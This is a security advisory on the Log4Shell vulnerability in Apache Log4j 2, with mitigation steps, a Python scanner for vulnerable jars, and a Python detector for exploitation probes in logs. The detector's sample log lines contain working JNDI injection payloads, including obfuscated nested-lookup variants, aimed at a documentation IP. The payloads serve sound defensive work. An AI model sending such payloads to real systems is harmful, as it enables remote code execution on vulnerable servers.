We are writing to inform our readers of a new high-profile zero-day vulnerability that affects a large number of Java applications through vulnerable versions of the widely used logging library Apache Log4j.
This is a critical-severity issue that allows an unauthenticated remote attacker to execute arbitrary code in the context of any affected application, typically by causing the application to log an attacker-controlled string (for example an HTTP header or a user name) containing a JNDI lookup.
This vulnerability has been assigned the identifier CVE-2021-44228 and affects applications using Apache Log4j 2 from 2.0-beta9 up to and including 2.14.1. The fix was released in Log4j 2.15.0.
We are informing our clients immediately because of the high impact of the exploit, the wide use of the vulnerable library both directly and as a transitive dependency in codebases, and the fact that it is believed to be under active exploitation by malicious actors using a publicly available exploit.
To mitigate this issue:
- Update log4j-core to 2.15.0 or later. The release-candidate version strings quoted in early reports (2.15.0-rc1, 2.15.0-rc2) were pre-release builds; deploy a released version.
- Run on at least JDK 6u211, 7u201, 8u191 or 11.0.1. These releases default com.sun.jndi.ldap.object.trustURLCodebase to false, which blocks loading classes from a remote LDAP codebase; verify that the property has not been set back to true. Treat this as defence in depth only: it does not stop the lookup itself, and exploitation remains possible through classes already on the classpath (serialized objects returned by the attacker's LDAP server) or through exfiltration of data embedded in the lookup URL.
- As a temporary measure while you work on the update, Log4j 2.10 and later can be started with the JVM argument -Dlog4j2.formatMsgNoLookups=true (or with the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) and the application restarted. Versions before 2.10 do not honour this setting; for those, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar instead.
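Finding every copy of log4j-core is the hard part of the update, because the library is routinely bundled inside fat jars, .war and .ear files. The following scanner is an added example written for this advisory, not tooling from the Apache project: it walks a directory tree, reads the version from the Maven pom.properties that log4j-core jars carry (an assumption about how the jar was built), descends into nested archives, and reports a jar as vulnerable when JndiLookup.class is present and the version is below 2.15.0 or cannot be parsed. The demo() tree it scans is constructed in a temporary directory with stand-in jars, not real Log4j artifacts.

```python
"""Scan a directory tree for vulnerable log4j-core jars, descending into
nested archives (fat jars, .war, .ear). Added example; not the advisory's
own tooling or the Apache project's."""
import io
import os
import re
import tempfile
import zipfile

# First Log4j 2 release that fixes CVE-2021-44228.
FIXED = (2, 15, 0)
# Class whose removal is the manual hotfix for versions that cannot be upgraded.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption: Maven-built log4j-core jars carry their version in this file.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """Return (major, minor, patch) from a pom.properties body, or None for
    strings such as 2.0-beta9 or 2.15.0-rc2, which are treated as unknown."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)\s*$", text, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(data, path):
    """Yield one finding per log4j-core archive found in `data` or nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        has_jndi = JNDI_CLASS in names
        yield {
            "path": path,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # Unknown version with the lookup class present is treated as vulnerable.
            "vulnerable": has_jndi and (version is None or version < FIXED),
        }
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            yield from inspect_archive(zf.read(name), path + "!" + name)


def scan_tree(root):
    """Walk `root` and return findings for every archive under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if fname.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), full))
    return findings


def build_sample_jar(version, include_jndi):
    """Constructed stand-in for a log4j-core jar (sample data, not a real jar)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo():
    """Lay out a constructed tree and return {relative path: vulnerable?}."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(build_sample_jar("2.14.1", True))   # vulnerable
    with open(os.path.join(root, "log4j-core-2.15.0.jar"), "wb") as fh:
        fh.write(build_sample_jar("2.15.0", True))   # fixed release
    # A .war embedding 2.14.1 with JndiLookup.class stripped (the manual hotfix).
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_sample_jar("2.14.1", False))
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    return {f["path"][len(root) + 1:]: f["vulnerable"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, vulnerable in demo().items():
        print("VULNERABLE" if vulnerable else "ok        ", path)
```

Point scan_tree() at an application's deployment directory rather than demo()'s temporary tree. The nested 2.14.1 jar in the sample .war is reported as not vulnerable only because JndiLookup.class has been removed from it; a 2.14.1 jar with the class present is flagged regardless of where it is embedded.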
For further information, please see the following references:
- https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- https://issues.apache.org/jira/browse/LOG4J2-3201
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
Additionally, to determine whether your servers have already seen exploitation attempts, search your application and web-server logs (e.g. under /var/log, or wherever your application writes them) for the string "${jndi:" rather than only "${jndi:ldap://". Attackers also use rmi://, dns:// and other JNDI schemes, and hide the keyword behind nested lookups such as ${${lower:j}ndi:...} or ${${::-j}ndi:...}, so a plain match on the literal string will miss many probes; the Neo23x0 gist referenced above covers many of these variants.
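To show why the literal search is not enough, the following detector is an added example (not part of the advisory and not from any referenced project). It resolves the innermost ${...} lookups the way Log4j's substitutor does for the lower:, upper:, empty-key and default-value (":-") tricks used to hide "jndi", then matches the normalised line against the JNDI schemes seen in probes. The access-log lines it runs over are constructed for the example; the IP address is from a documentation range.

```python
"""Find Log4Shell probes in log lines, including obfuscated ones. Added
example; the log lines are constructed, not taken from any real system."""
import re

# Innermost ${...} with no nested braces: resolved first, like Log4j's StrSubstitutor.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with any of the schemes seen in probes (ldap is the common one).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)

# Constructed sample access-log lines (not real traffic).
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.7/x}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7/y}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:05 +0000] "GET /login HTTP/1.1" 200 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://203.0.113.7/z}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:06 +0000] "GET / HTTP/1.1" 200 "-" "${jNdI:lDaP://203.0.113.7/w}"',
]


def resolve_inner(expr):
    """Evaluate one innermost lookup body for the tricks used to hide 'jndi':
    ${lower:J}, ${upper:j}, ${::-j}, ${env:UNSET:-j}. Anything else is left
    as written so real lookups such as ${jndi:...} survive for matching."""
    key, sep, default = expr.partition(":-")
    if key.lower().startswith("lower:"):
        return key[len("lower:"):].lower()
    if key.lower().startswith("upper:"):
        return key[len("upper:"):].upper()
    if sep:
        # Assumption: the referenced variable is unset, so the default value wins.
        return default
    return "${" + expr + "}"


def normalize(line, max_rounds=20):
    """Repeatedly resolve innermost lookups until the line stops changing."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(lambda m: resolve_inner(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def find_probes(lines):
    """Return (line number, scheme, used_nested_lookups) for each probing line."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm != raw))
    return hits


def naive_hits(lines):
    """What a plain search for the literal string "${jndi:ldap://" would find."""
    return [n for n, raw in enumerate(lines, 1) if "${jndi:ldap://" in raw]


if __name__ == "__main__":
    print("literal search matches lines:", naive_hits(SAMPLE_LINES))
    for n, scheme, nested in find_probes(SAMPLE_LINES):
        print("line %d: jndi:%s%s" % (n, scheme, " (nested lookups)" if nested else ""))
```

On the sample, the literal search finds only line 2, while the normalised search also catches the three nested-lookup variants and the mixed-case line. Probes can still use lookups this example leaves untouched, so treat it as a starting point for triage rather than a complete signature set.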